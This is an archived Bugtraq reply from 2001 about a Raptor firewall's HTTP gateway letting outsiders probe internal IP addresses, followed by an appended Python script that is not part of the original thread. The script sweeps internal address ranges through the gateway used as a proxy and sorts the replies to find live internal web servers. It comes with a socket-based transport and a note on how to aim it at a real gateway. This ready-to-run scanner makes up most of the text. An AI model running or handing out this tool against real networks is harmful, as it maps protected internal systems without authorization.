Bugtraq mailing list archives

Re: Raptor 6.5 http vulnerability


From: Alexander Bochmann <ab () GXIS DE>
Date: Tue, 27 Mar 2001 00:26:32 +0200

Hi,

...on Mon, Mar 26, 2001 at 10:34:30PM +0200, Lysel Christian Emre wrote:

> > I already noticed some months ago that the Raptor (6.0.2)
> > firewall's http gateway possibly leaks information about an
> > internal network with the method you described, if redirected
> It does not leak information about the internal network. The apache
> webserver can leak information from error pages:

It does, because by trial-and-error, you can find out about
IP addresses used on an internal interface with connections
from an outside interface, with basically the same method
as you described it, and by just monitoring the answers returned
by the firewall.

(On another note, at least with 6.5, if spoofing protection
isn't activated and configured correctly on the internal
interfaces, you can also flood the internal network with
packets generated by the firewall in answer to (spoofed)
packets on the outside interface - if you know the networks
used internally.)

> > It's possible to brute-force IP addresses used on a DMZ
> > network: If you use the http gateway on the external
> > interface as proxy, you can access internal IPs (and
> > internal DNS names) directly - just try them all ;)
> This should generate some logs!

As always, there has to be someone watching them.

> And can also be blocked by: http.urlpattern
> > Example:
> > setenv http_proxy http://external.firewall.name:80/
> > Now go on with something like...
> > lynx -mime_header http://192.168.95.2:80/
> > HTTP/1.1 503 Service Unavailable
> > Server: Simple, Secure Web Server 1.1
> > [.. etc ..]
> This is the internal interface for the firewall, right?

Right, but as I said, this request can be sent from the
outside interface.
You can also use internal DNS names from an outside interface
when addressing the http gateway as proxy, but I think these
are usually more difficult to find out, unless you have
an additional information source.

> > ...or, if you are lucky, an answer from a web server:
> > % lynx -mime_header http://192.168.95.74:80/
> And this is a request to the webserver?

Yes, located on an internal network.

> http.remove-header, should remove the headers :)

I didn't know that one... But I don't think it would
help, as an IP address with a working web server on
it will usually return an answer that doesn't look like
the error page of the http gateway on the Raptor, which
will be indication enough you have found a valid
internal IP, and can go on from there.

Alex.
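The probe the thread describes, written out as an added example (this is not code from the thread, from Raptor, or from either poster): it sends absolute-URI GET requests through the firewall's HTTP gateway used as a forward proxy and sorts each answer into the gateway's own 503 error page (nothing behind that address), a reply from a live internal web server, or no HTTP at all. The gateway signature (503 plus `Server: Simple, Secure Web Server 1.1`) is taken from the lynx output quoted above; the proxy name `external.firewall.name`, the target range, the Apache reply and all sample responses are constructed so the sweep runs offline.

```python
"""Sweep internal addresses through an HTTP gateway acting as a forward proxy.

Added example, not from the thread. Proxy name, targets and sample replies
are constructed for offline use.
"""
import ipaddress
import socket
from typing import Callable, Dict, Iterable, Optional, Tuple
from urllib.parse import urlsplit

# Signature of the gateway's "no host there" reply as seen in the lynx output
# in the thread. Assumption: status code plus Server header is enough to
# recognise it; adjust per deployment.
GATEWAY_ERROR_STATUS = 503
GATEWAY_SERVER_PREFIX = "Simple, Secure Web Server"

Transport = Callable[[str, int, bytes], bytes]


def build_proxy_request(target_host: str, port: int = 80) -> bytes:
    """Request line in absolute-URI form, i.e. what a client sends to a proxy."""
    return (
        f"GET http://{target_host}:{port}/ HTTP/1.0\r\n"
        f"Host: {target_host}:{port}\r\n"
        f"Connection: close\r\n\r\n"
    ).encode("ascii")


def parse_response(raw: bytes) -> Tuple[Optional[int], Dict[str, str]]:
    """Return (status code, lower-cased header map); status is None if not HTTP."""
    head = raw.partition(b"\r\n\r\n")[0]
    lines = head.decode("latin-1", "replace").split("\r\n")
    parts = lines[0].split(" ", 2)
    status = None
    if len(parts) >= 2 and parts[0].startswith("HTTP/") and parts[1].isdigit():
        status = int(parts[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def classify(raw: bytes) -> str:
    status, headers = parse_response(raw)
    if status is None:
        return "no-http"                 # nothing came back, or not HTTP
    server = headers.get("server", "")
    if status == GATEWAY_ERROR_STATUS and server.startswith(GATEWAY_SERVER_PREFIX):
        return "gateway-error"           # the proxy answered for an absent host
    if status == GATEWAY_ERROR_STATUS and not server:
        # Server header stripped (e.g. http.remove-header): the status code
        # alone still points at the gateway rather than a real web server
        return "probable-gateway-error"
    return "live-host"                   # anything else came from a real server


def tcp_transport(proxy_host: str, proxy_port: int, request: bytes,
                  timeout: float = 5.0) -> bytes:
    """Send one request to the proxy and read until it closes the connection."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def sweep(proxy_host: str, proxy_port: int, targets: Iterable[str],
          transport: Transport = tcp_transport) -> Dict[str, str]:
    """Probe each target via the proxy; map target -> classification."""
    results: Dict[str, str] = {}
    for target in targets:
        try:
            raw = transport(proxy_host, proxy_port, build_proxy_request(target))
        except OSError:
            results[target] = "proxy-unreachable"
            continue
        results[target] = classify(raw)
    return results


# Constructed replies standing in for the firewall so the sweep runs offline.
SAMPLE_REPLIES = {
    "192.168.95.2": (b"HTTP/1.1 503 Service Unavailable\r\n"
                     b"Server: Simple, Secure Web Server 1.1\r\n"
                     b"Content-Type: text/html\r\n\r\n<html>error</html>"),
    "192.168.95.74": (b"HTTP/1.1 200 OK\r\nServer: Apache\r\n"
                      b"Content-Type: text/html\r\n\r\n<html>intranet</html>"),
    "192.168.95.75": (b"HTTP/1.1 503 Service Unavailable\r\n"
                      b"Content-Type: text/html\r\n\r\n<html>error</html>"),
}


def fake_transport(proxy_host: str, proxy_port: int, request: bytes) -> bytes:
    """Stand-in for tcp_transport: answer from SAMPLE_REPLIES by target host."""
    url = request.split(b" ", 2)[1].decode("ascii")
    return SAMPLE_REPLIES.get(urlsplit(url).hostname or "", b"")


if __name__ == "__main__":
    targets = [str(h) for h in ipaddress.ip_network("192.168.95.0/29").hosts()]
    targets += ["192.168.95.74", "192.168.95.75"]
    for host, verdict in sweep("external.firewall.name", 80, targets,
                               transport=fake_transport).items():
        print(f"{host:16} {verdict}")
```

Against a real gateway, drop `transport=fake_transport` so the default `tcp_transport` is used. Each probe is one proxied GET, which is exactly what the reply above expects the gateway to log and what an http.urlpattern rule can block; the classifier falls back to the status code when http.remove-header has stripped the Server header, since a 503 from the proxy still does not look like a live server's answer.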

